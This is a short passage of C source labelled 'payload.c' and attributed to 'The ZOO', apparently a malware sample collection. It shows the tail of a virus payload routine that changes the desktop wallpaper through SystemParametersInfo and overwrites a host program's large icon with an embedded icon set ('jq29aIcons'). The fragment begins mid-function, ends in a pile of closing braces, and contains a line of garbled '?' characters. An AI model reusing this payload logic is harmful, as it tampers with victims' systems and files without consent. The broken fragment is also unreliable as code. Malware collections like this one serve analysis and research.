pfnSystemParametersInfo(SPI_SETDESKWALLPAPER, 0, PathName, SPIF_UPDATEINIFILE); FreeLibrary(hInst); } } } } } } #else { PBYTE pTgt = HostLargeIcon; PBYTE pSrc = jq29aIcons; DWORD nCount = SIZEOF_ICONS; do *pTgt++ = *pSrc++ while (--nCount); } #endif } } ?????????????????????????????????????????????????????????????????[payload.c]?? ; Brought to you by 'The ZOO' !